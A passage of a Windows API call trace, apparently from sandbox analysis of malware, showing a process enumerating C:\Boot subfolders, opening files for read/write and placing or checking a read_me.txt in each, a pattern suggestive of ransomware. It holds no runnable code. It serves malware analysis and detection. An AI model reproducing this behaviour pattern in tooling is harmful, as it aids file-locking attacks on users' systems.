lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.802] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0073.802] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.803] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0073.803] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.803] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0073.803] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.803] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.803] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\read_me.txt") returned 29 [0073.803] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\read_me.txt" (normalized: "c:\\boot\\es-es\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.803] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.803] CloseHandle (hObject=0x7b0) returned 1 [0073.803] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.803] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.803] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\read_me.txt") returned 29 [0073.803] GetProcessHeap () returned 0x280000 [0073.803] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.803] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 7 [0073.803] GetProcessHeap () returned 0x280000 [0073.803] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.803] GetProcessHeap () returned 0x280000 [0073.803] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80120 [0073.835] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0073.835] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.836] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0073.836] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.836] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0073.836] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.836] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0073.836] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.836] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.836] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt") returned 29 [0073.836] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt" (normalized: "c:\\boot\\fi-fi\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0073.836] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.836] CloseHandle (hObject=0x7b8) returned 1 [0073.836] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.836] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.836] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\read_me.txt") returned 29 [0073.836] GetProcessHeap () returned 0x280000 [0073.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80120 | out: hHeap=0x280000) returned 1 [0073.836] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 8 [0073.836] GetProcessHeap () returned 0x280000 [0073.836] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.836] GetProcessHeap () returned 0x280000 [0073.836] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.837] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0073.837] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.837] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0073.837] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.837] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0073.837] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0073.837] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0073.837] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.837] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0073.837] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0073.837] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.851] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0073.851] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0073.851] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.851] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0073.851] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0073.851] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.851] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.851] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\read_me.txt") returned 29 [0073.851] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\read_me.txt" (normalized: "c:\\boot\\fonts\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.851] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.851] CloseHandle (hObject=0x7ac) returned 1 [0073.851] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0073.851] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0073.852] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.852] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0073.852] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.852] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\read_me.txt") returned 29 [0073.852] GetProcessHeap () returned 0x280000 [0073.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.852] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 10 [0073.852] GetProcessHeap () returned 0x280000 [0073.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a800a0 | out: hHeap=0x280000) returned 1 [0073.852] GetProcessHeap () returned 0x280000 [0073.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.852] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0073.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.852] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0073.852] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.852] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\..") returned 20 [0073.852] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.852] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0073.852] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.852] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c7370, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.852] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt") returned 29 [0073.853] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt" (normalized: "c:\\boot\\hu-hu\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.853] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.853] CloseHandle (hObject=0x7ac) returned 1 [0073.853] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167c7370, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.853] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.853] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\read_me.txt") returned 29 [0073.853] GetProcessHeap () returned 0x280000 [0073.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.853] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 11 [0073.853] GetProcessHeap () returned 0x280000 [0073.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0073.853] GetProcessHeap () returned 0x280000 [0073.853] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0073.853] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\*") returned 19 [0073.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.853] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\.") returned 19 [0073.853] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167c7370, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167c7370, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.853] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\..") returned 20 [0073.853] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, 